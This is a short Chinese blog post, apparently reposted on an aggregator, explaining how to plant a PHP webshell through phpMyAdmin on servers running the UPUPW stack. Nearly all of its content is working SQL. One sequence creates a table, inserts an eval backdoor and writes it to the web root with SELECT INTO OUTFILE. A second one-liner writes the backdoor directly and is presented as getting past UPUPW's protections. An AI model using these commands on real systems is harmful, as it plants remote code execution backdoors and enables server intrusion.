upupw phpmyadmin写shell

时间：2017-06-22 00:09:32 阅读：170 评论：0 收藏：0 [点我收藏+]

标签：file into blog shell mysql wamp div sts drop

废话：

upupw给我的感觉是一个充当了waf毁三观的垃圾程序。然而，我讨厌的程序，管理员都特别喜欢用。

你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了。
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>‘);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/exehack.php‘;
DROP TABLE IF EXISTS `darkmoon`;

直接可以使用：

select ‘<?php @eval($_POST[august])?>‘ into outfile ‘D://upupw/XXX.php‘;

upupw phpmyadmin写shell

标签：file into blog shell mysql wamp div sts drop

原文地址：http://www.cnblogs.com/xishaonian/p/7062126.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行